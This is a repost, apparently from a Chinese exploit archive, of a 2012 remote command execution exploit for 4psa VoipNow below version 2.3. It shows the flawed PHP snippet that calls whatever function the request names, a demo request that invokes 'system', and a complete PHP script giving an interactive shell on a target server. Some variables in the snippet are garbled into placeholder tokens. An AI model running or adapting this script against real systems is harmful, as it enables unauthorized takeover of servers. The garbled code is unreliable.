首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
4psa VoipNow 2.x Remote Command Execution
来源:n0p1337@gmail.com 作者:i-Hmx 发布时间:2012-12-24  
<?
# Title: 4psa VoipNow < 2.3 , Remote Command Execution vuln
# Software Link: http://www.4psa.com/products-4psavoipnow.html
# Author: Faris , aka i-Hmx
# Home : sec4ever.com , 1337s.cc
# Mail : n0p1337@gmail.com
# Tested on: VoipNow dist.
/*
VoipNow suffer from critical RCE vuln.

Vulnerable File : plib/xajax_components.php
Snip.
if ( isset( 
___FCKpd___0
GET['varname'] ) ) { $func_name =
___FCKpd___0
GET['varname']; $func_arg =
___FCKpd___0
POST["fid-".
___FCKpd___0
GET['varname']]; $func_params =
___FCKpd___0
GET; if ( function_exists( $func_name ) ) { echo $func_name( $func_arg, $func_params ); } else { echo "<ul><li>Function: ".$func_name." does not exist.</li></ul>"; } } Demo Exploit : Get : plib/xajax_components.php?varname=system Post : fid-system=echo WTF!! so the result is echo system( 'echo WTF!!', array() ); the system var need just the 1st parameter so don't give fu#* about the array :D Peace out */ echo "\n+-------------------------------------------+\n"; echo "| VoipNow 2.5.3 |\n"; echo "| Remote Command Execution Exploit |\n"; echo "| By i-Hmx |\n"; echo "| n0p1337@gmail.com |\n"; echo "+-------------------------------------------+\n"; echo "\n| Enter Target [https://ip] # "; $target=trim(fgets(STDIN)); function faget($url,$post){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl, CURLOPT_POSTFIELDS,$post); curl_setopt($curl, CURLOPT_COOKIEFILE, '/'); curl_setopt($curl, CURLOPT_COOKIEJAR, '/'); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0); curl_setopt($curl,CURLOPT_TIMEOUT,20); curl_setopt($curl, CURLOPT_HEADER, false); $exec=curl_exec($curl); curl_close($curl); return $exec; } while(1) { echo "\ni-Hmx@".str_replace("https://","",$target)."# "; $cmd=trim(fgets(STDIN)); if($cmd=="exit"){exit();} $f_rez=faget($target."/plib/xajax_components.php?varname=system","fid-system=$cmd"); echo $f_rez; } # NP : Just cleaning my pc from an old old trash , The best is yet to come ;) ?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FireFly Mediaserver 1.0.0.1359
·Sony PC Companion 2.1 WebServi
·SurgeFTP Remote Command Execut
·Sony PC Companion 2.1 Load() U
·GNU Debugger 7.5.1 NULL Pointe
·Sony PC Companion 2.1 CheckCom
·IDA Pro 6.3 ELF Anti-Debugging
·Sony PC Companion 2.1 Admin_Re
·EMC Avamar 6.1.100-402 File Ov
·TWiki MAKETEXT Remote Command
·Microsoft Internet Explorer 9.
·Foswiki MAKETEXT Remote Comman
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved